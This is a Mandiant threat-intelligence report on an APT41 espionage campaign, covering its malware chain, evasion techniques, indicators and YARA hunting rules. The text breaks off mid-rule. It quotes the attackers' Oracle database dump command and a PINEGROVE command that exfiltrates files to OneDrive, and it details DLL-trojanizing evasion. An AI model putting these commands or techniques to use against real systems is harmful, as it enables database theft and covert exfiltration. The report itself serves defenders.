{ "id": "be8b1480-a1e6-4b25-a9d2-e04b830f915b", "created_at": "2026-04-06T00:18:34.096232Z", "updated_at": "2026-04-10T03:32:21.242245Z", "deleted_at": null, "sha1_hash": "0c90777c8e5814d8e624e737c865f4dd4e45372d", "title": "APT41 Has Arisen From the DUST", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 489513, "plain_text": "APT41 Has Arisen From the DUST\r\nBy Mandiant\r\nPublished: 2024-07-18 · Archived: 2026-04-05 14:29:03 UTC\r\nWritten by: Mike Stokkel, Pierre Gerlings, Renato Fontana, Luis Rocha, Jared Wilson, Stephen Eckels, Jonathan\r\nLepore\r\nExecutive Summary\r\nIn collaboration with Google’s Threat Analysis Group (TAG), Mandiant has observed a sustained campaign\r\nby the advanced persistent threat group APT41 targeting and successfully compromising multiple\r\norganizations operating within the global shipping and logistics, media and entertainment, technology, and\r\nautomotive sectors. The majority of organizations were operating in Italy, Spain, Taiwan, Thailand, Turkey,\r\nand the United Kingdom.\r\nAPT41 successfully infiltrated and maintained prolonged, unauthorized access to numerous victims'\r\nnetworks since 2023, enabling them to extract sensitive data over an extended period. \r\nAPT41 used a combination of ANTSWORD and BLUEBEAM web shells for the execution of\r\nDUSTPAN to execute BEACON backdoor for command-and-control communication. Later in the\r\nintrusion, APT41 leveraged DUSTTRAP, which would lead to hands-on keyboard activity. APT41 used\r\npublicly available tools SQLULDR2 for copying data from databases and PINEGROVE to exfiltrate data\r\nto Microsoft OneDrive.\r\nOverview\r\nRecently, Mandiant became aware of an APT41 intrusion where the malicious actor deployed a combination of\r\nANTSWORD and BLUEBEAM web shells for persistence. These web shells were identified on a Tomcat Apache\r\nManager server and active since at least 2023. APT41 utilized these web shells to execute certutil.exe to download\r\nthe DUSTPAN dropper to stealthily load BEACON. \r\nAs the APT41 intrusion progressed, the group escalated its tactics by deploying the DUSTTRAP dropper. Upon\r\nexecution, DUSTTRAP would decrypt a malicious payload and execute it in memory, leaving minimal forensic\r\ntraces. The decrypted payload was designed to establish communication channels with either APT41-controlled\r\ninfrastructure for command and control or, in some instances, with a compromised Google Workspace account,\r\nfurther blending its malicious activities with legitimate traffic. The affected Google Workspace accounts have\r\nbeen successfully remediated to prevent further unauthorized access.\r\nFurthermore, APT41 leveraged SQLULDR2 to export data from Oracle Databases, and used PINEGROVE to\r\nsystematically and efficiently exfiltrate large volumes of sensitive data from the compromised networks,\r\ntransferring to OneDrive to enable exfiltration and subsequent analysis.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/apt41-arisen-from-dust\r\nPage 1 of 22\n\nFigure 1: Attack path diagram of observed APT41 attack\r\nVictimology\r\nIn collaboration with Google's TAG, Mandiant notified multiple additional organizations across various sectors\r\nthat have been compromised by this campaign. The organizations impacted by this campaign originated from a\r\ndiverse range of countries spanning multiple continents, including:\r\nItaly\r\nSpain\r\nTaiwan\r\nThailand\r\nTurkey\r\nUnited Kingdom\r\nAn analysis of victim organizations within specific sectors reveals a notable geographic distribution. Nearly all\r\ntargeted organizations operating in the shipping and logistics sector were located in Europe and the Middle East,\r\nwith a single exception. In contrast, all affected organizations within the media and entertainment sector were\r\nlocated in Asia.\r\nA significant portion of the victimized organizations within the shipping and logistics sector maintained operations\r\nacross multiple continents, often as subsidiaries or affiliates of larger multinational corporations operating within\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/apt41-arisen-from-dust\r\nPage 2 of 22\n\nthe same industry.\r\nMandiant has detected reconnaissance activity directed towards similar organizations operating within other\r\ncountries such as Singapore. At the time of the publication, neither Mandiant nor Google TAG have any indicators\r\nof these organizations being compromised by APT41, but it could potentially indicate an expanded scope of\r\ntargeting.\r\nFigure 2: Sectors impacted by APT41’s DUSTTRAP campaigns in 2024\r\nAPT41\r\nAPT41 is a prolific cyber threat group that carries out Chinese state-sponsored espionage activity in addition to\r\nfinancially motivated activity that may be outside of state control.  The group's financially motivated intrusions\r\nhave primarily targeted the video game industry, involving activities such as stealing source code and digital\r\ncertificates, manipulating virtual currencies, and attempting to deploy ransomware. APT41 is unique among\r\ntracked China-based actors in that it utilizes non-public malware typically reserved for espionage operations in\r\nactivities that appear to fall outside the scope of state-sponsored missions.\r\nThe group's espionage operations have targeted sectors such as healthcare, high-tech, and telecommunications,\r\nand other areas of economic interest. APT41 has frequently used software supply chain compromises, where they\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/apt41-arisen-from-dust\r\nPage 3 of 22\n\ninject malicious code into legitimate software updates. They also employ advanced techniques like the use of\r\nbootkits and compromised digital certificates. The group's consistent targeting of the video game industry for\r\npersonal gain is believed to have contributed to the development of tactics later used in their espionage\r\noperations. \r\nFor additional information on APT41, refer to the following links:\r\nDoes This Look Infected? A Summary of APT41 Targeting U.S. State Governments\r\nThreat Activity\r\nDUSTPAN and BEACON\r\nDUSTPAN is an in-memory dropper written in C/C++ that decrypts and executes an embedded payload. Different\r\nvariations of DUSTPAN may also load an external payload off disk from a hard-coded file path encrypted in the\r\nPortable Executable (PE) file. DUSTPAN may be configured to inject the decrypted payload into another process\r\nor create a new thread and execute it within its own process space. \r\nPreviously used by APT41 in several 2021 and 2022 breaches, DUSTPAN resurfaced in a recent investigation.\r\nThis time, APT41 disguised DUSTPAN as a Windows binary by executing the malicious file as w3wp.exe or\r\nconn.exe. Additionally, the DUSTPAN samples were made persistent via Windows services; for example, one of\r\nthe services was called Windows Defend .\r\nThe DUSTPAN samples were configured to load BEACON payloads into memory that were encrypted using\r\nchacha20. The BEACON payloads, once executed, communicated using either self-managed infrastructure hosted\r\nbehind Cloudflare or utilized Cloudflare Workers as their command-and-control (C2) channels. BEACON\r\nconfiguration can be found in the Indicators of Compromise section.\r\nDUSTTRAP\r\nDUSTTRAP is a multi-stage plugin framework with multiple components. DUSTTRAP begins with a launcher\r\n(Stage 1) that AES-128-CFB decrypts an encrypted on-disk PE file \u003cvaries\u003e.dll.mui and executes it in\r\nmemory. Decryption relies on the target machine's HKLM\\SOFTWARE\\Microsoft\\Cryptography\\MachineGUID ,\r\nthereby keying the launcher to the victim system. The decrypted PE from the launcher is a memory-only dropper\r\n(Stage 2) that is responsible for decrypting an embedded configuration and two or more embedded plugin\r\ndynamic-link libraries (DLLs) from its .lrsrc section. Once executed, these DLLs begin the setup of the\r\nmodular plugin system. The first observed plugin (Stage 3) is responsible for low-level network setup and\r\nencryption. The second observed plugin (Stage 4) is responsible for higher-level network operations and may\r\nfunction as a downloader for additional plugins that, when loaded, may register themselves with prior components\r\nin the execution chain for additional functionality. We've observed the second plugin to vary in functionality and\r\nmore plugin variants likely exist. \r\nPlugin loading is performed by trojanizing a legitimate system DLL from %windir% with a sufficiently large\r\n.text section to hold the contents of each plugin. To trojanize the target DLL, the dropper will generate a new\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/apt41-arisen-from-dust\r\nPage 4 of 22\n\nfile on disk at %windir%\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Data.Trace\\\r\nv4.0_4.0.0.0__b0\u003chex_uuid\u003e\\\u003coriginal_module_name\u003e.dll or\r\n%programdata%\\Microsoft.NET\\System.Data.Trace\\v4.0_4.0.0.0__b0\u003chex_uuid\u003e\\\u003coriginal_module_name\u003e.dll .\r\nThe malicious plugin code is only present in the .text section of this file long enough to call\r\nZwCreateSection , loading the trojanized malicious plugin code into memory. Before the trojanized file is closed,\r\nthe original contents of the .text section are restored on disk. This is an evasion technique that will bypass\r\nendpoint detection and response (EDR) solutions that scan for malicious contents on file close. The malicious\r\ncode may therefore not be present in the file depending on when it was quarantined. During the trojanization\r\nprocess, the system time may be written to a log file at \u003cfiletime\u003e.log and acquire the mutex\r\nICMzUEkdLNayBdWF , though mutex names will likely vary from host to host.\r\nThe following legitimate DLLs are blocklisted from being trojanized:\r\ncfgmgr32.dll\r\ncombase.dll\r\ncryptbase.dll\r\ncryptsp.dll\r\ndhcpcsvc.dll\r\ndhcpcsvc6.dll\r\ndnsapi.dll\r\nFWPUCLNT.DLL\r\ngdi32.dll\r\ngdi32full.dll\r\niertutil.dll\r\nimm32.dll\r\nIPHLPAPI.DLL\r\nkernel.appcore.dll\r\nkernel32.dll\r\nKernelBase.dll\r\nlocale.nls\r\nmsvcp_win.dll\r\nmsvcrt.dll\r\nmswsock.dll\r\nNapiNSP.dll\r\nnlaapi.dll\r\nnsi.dll\r\nntdll.dll\r\nntmarta.dll\r\noleaut32.dll\r\nOnDemandConnRouteHelper.dll\r\npnrpnsp.dll\r\npowrprof.dll\r\nadvapi32.dll\r\napphelp.dll\r\nbcrypt.dll\r\nbcryptprimitives.dll\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/apt41-arisen-from-dust\r\nPage 5 of 22\n\nprofapi.dll\r\nrasadhlp.dll\r\nrpcrt4.dll\r\nrsaenh.dll\r\nsechost.dll\r\nSHCore.dll\r\nshell32.dll\r\nshlwapi.dll\r\nsspicli.dll\r\nucrtbase.dll\r\nurlmon.dll\r\nuser32.dll\r\nuserenv.dll\r\nwebio.dll\r\nwin32u.dll\r\nwindows.storage.dll\r\nwinhttp.dll\r\nwininet.dll\r\nwinnlsres.dll\r\nwinnsi.dll\r\nwinrnr.dll\r\nwinsta.dll\r\nws2_32.dll\r\nwshbth.dll\r\nWtsapi32.dll\r\nThe section objects created by the Stage 2 dropper for each trojanized plugin are appended to a linked list in the\r\ndroppers process and executed in memory. The dropper and each plugin perform a registration process with each\r\nother so that stages 2, 3, and 4 rely on each other and cooperatively call into and out of each other to handle the\r\noperation each is responsible for. Execution between all of these components is accomplished via Windows fiber-based task event loop driven by Stage 2. Additional plugins may be registered and executed via this plugin\r\nframework.\r\nWe've observed at least 15 plugins with the higher-level themes of:\r\nShell Operations\r\nExecuting processes via cmd.exe\r\nFile System Operations\r\nDirectory enumeration\r\nChanging directory\r\nDelete file\r\nCreate directory\r\nCopy file\r\nMove file\r\nFile exists\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/apt41-arisen-from-dust\r\nPage 6 of 22\n\nChange file timestamp\r\nList attached drives\r\nProcess Operations\r\nEnumerate running processes\r\nInject shellcode\r\nKill a process\r\nNetwork Probing\r\nPing a remote host\r\nAttempt connections on port\r\nNetwork Store Interface Operations\r\nGet network interface statistics\r\nScreen Operations\r\nGet screen size\r\nScreenshot\r\nSystem Information Survey\r\nList RDP sessions\r\nList installed security software\r\nGet system info\r\nList user accounts\r\nGet system boot time\r\nEnumerate hidden and visible process windows\r\nFile Manipulation Operations\r\nOpen file\r\nWrite file\r\nCRC32 file content\r\nRead file\r\nClose file\r\nKeylogger\r\nActivate \r\nDelete log\r\nActive Directory Operations\r\nEnumerate domain controller information\r\nAdd user\r\nDelete user\r\nGet server configuration\r\nGet server shares\r\nGet detailed server and workstation domain information\r\nEnumerate servers\r\nGet list of services\r\nGet list of network shares\r\nAdd network share\r\nDisconnect network share\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/apt41-arisen-from-dust\r\nPage 7 of 22\n\nGet list of users\r\nSet user password\r\nFile Uploader\r\nUpload file resident on disk\r\nRDP\r\nEnumerate remote desktop sessions\r\nDNS Operations\r\nPerform DNS lookups\r\nDNS Cache Operations\r\nRetrieves DNS cache table operations\r\nRegistry Operations\r\nGet registry value\r\nDump registry path and children to disk\r\nSet registry value\r\nDelete registry value\r\nFigure 3: Full execution flow of DUSTTRAP\r\nSQLULDR2\r\nSQLULDR2 is a command-line utility written in C/C++ that can be used to export the contents of a remote Oracle\r\ndatabase to a local text-based file. There are multiple command-line parameters available to specify the details of\r\nthe data export including but not limited to: query, user, rows, and text.\r\nAPT41 exported data from Oracle Databases to CSV formats with the following command:\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/apt41-arisen-from-dust\r\nPage 8 of 22\n\nC:\\ProgramData\\luldr\\luldr\\sqluldr.exe user=\u003cUSER\u003e@\u003cSYSTEM\u003e:1521/\r\n\u003cDATABASE\u003e charset=utf8 safe=yes head=yes text=csv rows=50000000\r\nbatch=yes query=\u003cSQL QUERY\u003e file=\u003cOUTPUT\u003e.csv\r\nFigure 4: Command line execution for SQLULDR2\r\nPINEGROVE\r\nDuring the intrusion, Mandiant observed APT41 leveraging PINEGROVE for their data exfiltration.\r\nPINEGROVE is a command-line uploader written in Go with functionality to collect and upload a file to\r\nOneDrive via the OneDrive API. PINEGROVE expects an authentication JSON file including relevant OneDrive\r\ncredentials and the target file to upload.\r\nC:\\Programdata\\One.exe -c C:\\ProgramData\\auth.json -s \u003cFilename\u003e\r\nFigure 5: Command line execution for PINEGROVE\r\nPINEGROVE is a publicly available tool and has been made available on Github.\r\nCode Signing Certificates\r\nThe DUSTTRAP malware and its associated components that were observed during the intrusion were code\r\nsigned with presumably stolen code signing certificates. One of the code signing certificates seemed to be related\r\nto a South Korean company operating in the gaming industry sector.\r\nSerial Number:\r\n 6f:97:f1:3d:a5:5e:9f:70:a6:92:7e:d1:b3:3e:ee:ee\r\nSignature Algorithm: sha256WithRSAEncryption\r\nIssuer: C = US, O = \"thawte, Inc.\", CN = thawte SHA256 Code Signing CA\r\nValidity\r\n Not Before: Feb 21 00:00:00 2019 GMT\r\n Not After : Apr 21 23:59:59 2022 GMT\r\nSubject: C = KR, ST = SEOUL, L = Gangnam-gu, O = CCR INC, OU = IT Team,\r\nCN = CCR INC\r\nFigure 6: Code signing certificate abused by APT41\r\nSerial Number:\r\n 05:fa:8a:72:da:46:07:4f:de:1e:34:c7:46:61:ee:00\r\nSignature Algorithm: sha256WithRSAEncryption\r\nIssuer: C = US, O = DigiCert Inc, OU = www.digicert.com,\r\nCN = DigiCert SHA2 Assured ID Code Signing CA\r\nValidity\r\n Not Before: Jul 15 00:00:00 2020 GMT\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/apt41-arisen-from-dust\r\nPage 9 of 22\n\nNot After : Aug 31 12:00:00 2022 GMT\r\nSubject: C = RU, L = Moscow, O = OOO ALEAN-TOUR, CN = OOO ALEAN-TOUR\r\nFigure 7: Code signing certificate abused by APT41\r\nAdditionally, Mandiant observed an additional DUSTTRAP sample on VirusTotal that was code signed with a\r\ncertificate from another South Korean gaming company. This same certificate was previously observed by\r\nMandiant in 2020 being used by UNC3914, which is suspected to be another Chinese-nexus threat actor. Note that\r\nneither Mandiant nor TAG see any direct relation between UNC3914 and APT41 at the time of writing.\r\nSerial Number:\r\n 0a:2c:bf:9b:18:fe:1b:20:b9:4e:ca:c4:b0:78:b8:c1\r\nSignature Algorithm: sha256WithRSAEncryption\r\nIssuer: C = US, O = DigiCert Inc, OU = www.digicert.com,\r\nCN = DigiCert SHA2 Assured ID Code Signing CA\r\nValidity\r\n Not Before: Nov 12 00:00:00 2020 GMT\r\n Not After : Jan 17 23:59:59 2023 GMT\r\nSubject: C = KR, ST = Seoul, L = Gangnam-gu,\r\nO = Gala Lab Corp., CN = Gala Lab Corp.\r\nFigure 8: Code signing certificate abused by APT41\r\nThe use of the code signing certificate, as well as its suspected owners being companies in the gaming sector,\r\naligns with APT41's tactics, techniques, and procedures (TTPs) and past campaigns. More details about this can be\r\nfound in our APT41 report. \r\nAcknowledgement\r\nWe would like to thank Google’s TAG, our Incident Response consultants and FLARE who enabled this research.\r\nAdditionally, we want to thank Mnemonic for reaching out to Mandiant to share their observations.\r\nMITRE ATT\u0026CK\r\nTACTIC ID Name Description\r\nReconnaissance T15931.002\r\nSearch Open\r\nWebsites/Domains:\r\nSearch Engines\r\nAPT41 was observed using search engines\r\nin visiting victim's reachable servers.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/apt41-arisen-from-dust\r\nPage 10 of 22\n\nReconnaissance T1594\r\nSearch Victim-Owned\r\nWebsites\r\nAPT41 was observed visiting victim-owned infrastructure that was externally\r\nreachable and observed in internet scan\r\ndata.\r\nCollection T1560.001 Archive via Utility\r\nAPT41 was observed using rar to compress\r\nthe data they downloaded from internal\r\nOracle Databases.\r\nCommand and\r\nControl\r\nT1071.001 Web Protocols\r\nAPT41 was observed using HTTPS for the\r\ncommunication as C2 for their malware.\r\nExfiltration T1567.002\r\nExfiltration to Cloud\r\nStorage\r\nAPT41 was observed using OneDrive for\r\nthe exfiltration of staged data.\r\nPersistence T1543.003\r\nCreate or Modify System\r\nProcess: Windows\r\nService\r\nAPT41 was observed creating a Windows\r\nService to achieve persistency\r\nPersistence T1574.001\r\nDLL Search Order\r\nHijacking\r\nAPT41 abused DLL search order hijacking\r\nto execute DUSTTRAP by using benign\r\nand malicious code-signed Windows\r\nbinaries.\r\nPersistence T1574.002 DLL Side-Loading\r\nAPT41 abused DLL sideloading to execute\r\nDUSTTRAP by using the AhnLab\r\nuninstaller.\r\nDefense Evasion T1070.004 File Deletion\r\nAPT41 deleted files from the system after\r\nthey were done using them. This was\r\nobserved after APT41 created database\r\ndumps and exfiltrated the files.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/apt41-arisen-from-dust\r\nPage 11 of 22\n\nDefense Evasion T1036.005\r\nMatch Legitimate Name\r\nor Location\r\nAPT41 used legitimate Windows names\r\nand locations to trojanize binaries\r\nDefense Evasion T1027.013 Encrypted/Encoded File\r\nAPT41 leveraged AES-128-CFB for the\r\nencryption of the payloads that should be\r\nloaded by DUSTTRAP.\r\nPersistence T1505.003\r\nServer Software\r\nComponent: Web Shell\r\nAPT41 was observed using web shells to\r\ndrop and execute DUSTPAN.\r\nExecution T1569.002 Service Execution\r\nAPT41 was observed using Windows\r\nservices to execute DUSTPAN binaries.\r\nIndicators of Compromise\r\nA GTI Collection is available for all the samples that are publicly available. \r\nHost-Based Indicators\r\nFilename MD5 Family\r\nsqluldr.exe fcff642268898fcf65702a214aefbf9e SQLULDR2\r\nOneDriveUploader.exe ac125aea0b703de37980779599438b4a PINEGROVE\r\naclui.dll 17d0ada8f5610ff29f2e8eaf0e3bb578 DUSTPAN\r\ndbgeng.dll 9991ce9d2746313f505dbf0487337082 DUSTTRAP\r\ndbgeng.dll c33247bc3e7e8cb72133e47930e6ddad DUSTTRAP\r\nhostfxr.dll cfce85548436fb89a83bf34dc17f325d DUSTTRAP\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/apt41-arisen-from-dust\r\nPage 12 of 22\n\ndbgeng.dll e98b9e21928252332edf934f3d18ac21 DUSTTRAP\r\ndbgeng.dll 8222352a61eacca3a1c6517956aa0b55 DUSTTRAP\r\n- dc725f5e9b1ae062fbec86ee4d816b45 DUSTTRAP\r\nSbiedll.dll d72f202c1d684c9a19f075290a60920f DUSTTRAP\r\natstrust.dll 393065ef9754e3f39b24b2d1051eab61 DUSTTRAP\r\n- 0e74285f3359393e57f5d49c156aca47 DUSTTRAP\r\nconn.exe 35f650c94faf6a2068e8238dd99edbea DUSTPAN\r\nPrintWorkflowUserSvc_\r\na0c15f9d.dll / cbi.dll\r\n3bb44c0dd7f424864d76d4df09538cb6 DUSTPAN\r\ndbgeng.dll aca5c6daecf463012a09564764584937 DUSTTRAP\r\n- 336a0d6f8cc92bf9740ce17de600463b DUSTTRAP\r\n- 6bc4a92ff4d2cfc9da91ae6a5d2ad3d5 DUSTTRAP\r\n- a689e182fe33b9d564dddc35412ea0a7 DUSTTRAP\r\n- e4a4aafb49b8c86a5ac087ae342c0ee6 DUSTTRAP\r\n- e584119a4766e6cf49093c666965c8be DUSTTRAP\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/apt41-arisen-from-dust\r\nPage 13 of 22\n\n- f1769ad5a9dc44794895275c656ed484 DUSTTRAP\r\nNetwork-Based Indicators\r\nValue Family Comment\r\nns2[.]akacur[.]tk BEACON -\r\nns1[.]akacur[.]tk BEACON -\r\norange-breeze-66bb[.]tezsfsoikdvd[.]workers[.]dev\r\nBEACON -\r\nwww[.]eloples[.]com DUSTTRAP\r\nFirst observed at 2024-02-21 Last\r\nobserved at 2024-07-16\r\n95.164.16[.]231 -\r\nRelated to DUSTTRAP FQDN\r\nwww[.]eloples[.]com\r\n152.89.244[.]185 -\r\nUsed to deliver DUSTPAN\r\nFirst activity observed at 2023-03-\r\n21\r\nhxxp://152.89.244[.]185/conn.exe -\r\nUsed to deliver DUSTPAN\r\nFirst activity observed at 2023-03-\r\n21\r\nYARA and YARA-L Rules\r\nYARA\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/apt41-arisen-from-dust\r\nPage 14 of 22\n\nrule M_Hunting_Certificate_Gala_lab_corp\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Rule looks for PEs signed using likely stolen\r\ncertificate issued for Gala Lab corp\"\r\n disclaimer = \"This rule is meant for hunting and is not tested\r\nto run in a production environment.\"\r\n strings:\r\n $org = \"Gala Lab Corp.\"\r\n $serial = { 0A 2C BF 9B 18 FE 1B 20 B9 4E CA C4 B0 78 B8 C1 }\r\n condition:\r\n ((uint16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550)\r\nor (uint32(0) == 0xE011CFD0 and uint32(4) == 0xE11AB1A1))\r\nand #org \u003e 1 and $serial\r\n}\r\nrule M_Hunting_Certificate_CCR_INC\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Rule looks for PEs signed using likely\r\nstolen certificate issued for CCR INC\"\r\n disclaimer = \"This rule is meant for hunting and is not\r\ntested to run in a production environment.\"\r\n strings:\r\n $org = \"CCR INC\"\r\n $serial = { 6F 97 F1 3D A5 5E 9F 70 A6 92 7E D1 B3 3E EE EE }\r\n condition:\r\n ((uint16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550) or\r\n(uint32(0) == 0xE011CFD0 and uint32(4) == 0xE11AB1A1)) and #org \u003e 1\r\nand $serial\r\n}\r\nrule M_Hunting_Certificate_ALEAN_TOUR\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Rule looks for PEs signed using likely\r\nstolen certificate issued for ALEAN-TOUR\"\r\n disclaimer = \"This rule is meant for hunting and is not\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/apt41-arisen-from-dust\r\nPage 15 of 22\n\ntested to run in a production environment.\"\r\n strings:\r\n $org = \"OOO ALEAN-TOUR\"\r\n $serial = { 05 FA 8A 72 DA 46 07 4F DE 1E 34 C7 46 61 EE 00 }\r\n condition:\r\n ((uint16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550)\r\nor (uint32(0) == 0xE011CFD0 and uint32(4) == 0xE11AB1A1))\r\nand #org \u003e 1 and $serial\r\n}\r\nrule M_Hunting_Uploader_PINEGROVE_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Hunting for PINEGROVE uploader\r\nmalware family.\"\r\n disclaimer = \"This rule is meant for hunting and is not\r\ntested to run in a production environment.\"\r\n strings:\r\n $s1 = \"Config: `%v`\" ascii\r\n $s2 = \"auth.json\" ascii\r\n $s3 = \"sp=%v%v%x\" ascii\r\n $s4 = \"Time: %v\" ascii\r\n $s5 = \"/me/drive/root\" ascii\r\n $s6 = \"OneDrive\" ascii fullword\r\n $s7 = \"microsoft.graph.driveItemUploadableProperties\" ascii\r\n $s8 = \"client_id=%v\u0026client_secret=%v\" ascii\r\n $s9 = \"http://localhost/onedrive-login\" ascii\r\n condition:\r\n (\r\n ((uint32(0) == 0xcafebabe) or (uint32(0) == 0xfeedface) or\r\n(uint32(0) == 0xfeedfacf) or (uint32(0) == 0xbebafeca) or\r\n(uint32(0) == 0xcefaedfe) or (uint32(0) == 0xcffaedfe)) or\r\n (uint32(0) == 0x464c457f) or\r\n (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550)\r\n ) and\r\n (6 of them)\r\n}\r\nrule M_Hunting_Uploader_PINEGROVE_2\r\n{\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/apt41-arisen-from-dust\r\nPage 16 of 22\n\nmeta:\r\n author = \"Mandiant\"\r\n description = \"Hunting for PINEGROVE uploader\r\nmalware family.\"\r\n disclaimer = \"This rule is meant for hunting and is not\r\ntested to run in a production environment.\"\r\n strings:\r\n $f1 = \"main.AllFiles\" ascii\r\n $f2 = \"main.Collect\" ascii\r\n $f3 = \"main.ConfigInit\" ascii\r\n $f4 = \"main.ConfigRead\" ascii\r\n $f5 = \"main.ConfigSave\" ascii\r\n $f6 = \"main.ConfigUpdate\" ascii\r\n $f7 = \"main.Exit\" ascii\r\n $f8 = \"main.FileRange\" ascii\r\n $f9 = \"main.FileReader\" ascii\r\n $f10 = \"main.FileStatus\" ascii\r\n $f11 = \"main.FormatRemoteFilePath\" ascii\r\n $f12 = \"main.GetFileName\" ascii\r\n $f13 = \"main.GetReomtePath\" ascii\r\n $f14 = \"main.Header\" ascii\r\n $f15 = \"main.init.0\" ascii\r\n $f16 = \"main.InitFile\" ascii\r\n $f17 = \"main.IsFolder\" ascii\r\n $f18 = \"main.main\" ascii\r\n $f19 = \"main.PreLoad\" ascii\r\n $f20 = \"main.Range2Int\" ascii\r\n $f21 = \"main.RemainTime\" ascii\r\n $f22 = \"main.SessionCreate\" ascii\r\n $f23 = \"main.ShowBar\" ascii\r\n $f24 = \"main.StringChecker\" ascii\r\n $f25 = \"main.Task\" ascii\r\n $f26 = \"main.TaskFail\" ascii\r\n $f27 = \"main.ThreadUpload\" ascii\r\n $f28 = \"main.Timer\" ascii\r\n $f29 = \"main.TimeUnix\" ascii\r\n $f30 = \"main.Upload\" ascii\r\n $f31 = \"main.Upload.func1\" ascii\r\n $f32 = \"main.Uploading\" ascii\r\n $version = \"go1.13.1\"\r\n condition:\r\n (\r\n ((uint32(0) == 0xcafebabe) or (uint32(0) == 0xfeedface) or\r\n(uint32(0) == 0xfeedfacf) or (uint32(0) == 0xbebafeca) or\r\n(uint32(0) == 0xcefaedfe) or (uint32(0) == 0xcffaedfe)) or\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/apt41-arisen-from-dust\r\nPage 17 of 22\n\n(uint32(0) == 0x464c457f) or\r\n (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550)\r\n ) and\r\n $version and (25 of ($f*))\r\n}\r\nrule M_Hunting_Uploader_PINEGROVE_3\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Hunting for PINEGROVE uploader\r\nmalware family.\"\r\n disclaimer = \"This rule is meant for hunting and is not\r\ntested to run in a production environment.\"\r\n strings:\r\n $s1 = \"RefreshToken\"\r\n $s2 = \"RefreshInterval\"\r\n $s3 = \"ThreadNum\"\r\n $s4 = \"BlockSize\"\r\n $s5 = \"SigleFile\"\r\n $s6 = \"MainLand\"\r\n $s7 = \"MSAccount\"\r\n $anchor1 = \"driveItemUploadableProperties\"\r\n $anchor2 = \"client_id\"\r\n $anchor3 = \"client_secret\"\r\n $anchor4 = \"onedrive-login\"\r\n $anchor5 = \"authorization_code\"\r\n condition:\r\n (\r\n ((uint32(0) == 0xcafebabe) or (uint32(0) == 0xfeedface) or\r\n(uint32(0) == 0xfeedfacf) or (uint32(0) == 0xbebafeca) or\r\n(uint32(0) == 0xcefaedfe) or (uint32(0) == 0xcffaedfe)) or\r\n (uint32(0) == 0x464c457f) or\r\n (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550)\r\n ) and\r\n (5 of ($s*)) and\r\n (4 of ($anchor*))\r\n}\r\nimport \"elf\"\r\nrule M_Hunting_Utility_Linux_SQLULDR2_1\r\n{\r\n meta:\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/apt41-arisen-from-dust\r\nPage 18 of 22\n\nauthor = \"Mandiant\"\r\n description = \"Detection of the Linux version of SQLULDR2.\"\r\n disclaimer = \"This rule is meant for hunting and is not\r\ntested to run in a production environment.\"\r\n strings:\r\n $name = \"sqluldr2zip.c\" ascii\r\n $out = \"uldrdata.%p.txt\" ascii\r\n $heading = \"SQL*UnLoader: Fast Oracle Text Unloader\" ascii\r\n $p1 = \"exec = the command to execute the SQLs\" ascii\r\n $p2 = \"file = output file name(default: uldrdata.txt)\" ascii\r\n $p3 = \"format = MYSQL: MySQL Insert SQLs, SQL: Insert SQLs\" ascii\r\n $p4 = \"text = output type (MYSQL, CSV, MYSQLINS,\r\nORACLEINS, FORM, SEARCH)\" ascii\r\n $p5 = \"rows = print progress for every given rows\r\n(default, 1000000)\" ascii\r\n $p6 = \"query = select statement\" ascii\r\n $p7 = \"user = username/password@tnsname\" ascii\r\n condition:\r\n (uint32(0) == 0x464c457f) and\r\n $name and $out and $heading and (5 of ($p*)) and\r\n for any i in (0 .. elf.symtab_entries):\r\n(elf.symtab[i].name == \"OCIServerAttach\") and\r\n for any i in (0 .. elf.symtab_entries):\r\n(elf.symtab[i].name == \"OCISessionBegin\")\r\n}\r\nimport \"pe\"\r\nimport \"elf\"\r\nrule M_Hunting_Utility_SQLULDR2_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Detection of SQLULDR2.\"\r\n disclaimer = \"This rule is meant for hunting and is not\r\ntested to run in a production environment.\"\r\n strings:\r\n $win_name = \"sqluldr2.exe\" ascii\r\n $elf_name = \"sqluldr2zip.c\" ascii\r\n $out = \"uldrdata.%p.txt\" ascii\r\n $heading = \"SQL*UnLoader: Fast Oracle Text Unloader\" ascii\r\n $p1 = \"exec = the command to execute the SQLs\" ascii\r\n $p2 = \"file = output file name(default: uldrdata.txt)\" ascii\r\n $p3 = \"format = MYSQL: MySQL Insert SQLs, SQL: Insert SQLs\" ascii\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/apt41-arisen-from-dust\r\nPage 19 of 22\n\n$p4 = \"text = output type (MYSQL, CSV, MYSQLINS,\r\nORACLEINS, FORM, SEARCH)\" ascii\r\n $p5 = \"rows = print progress for every given rows\r\n(default, 1000000)\" ascii\r\n $p6 = \"query = select statement\" ascii\r\n $p7 = \"user = 